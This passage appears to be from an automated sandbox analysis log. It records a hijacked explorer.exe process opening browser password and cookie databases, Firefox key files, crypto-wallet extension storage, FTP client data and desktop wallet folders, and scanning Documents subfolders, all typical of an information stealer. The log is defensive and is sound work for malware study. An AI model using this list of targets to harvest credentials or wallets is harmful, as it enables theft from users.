Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
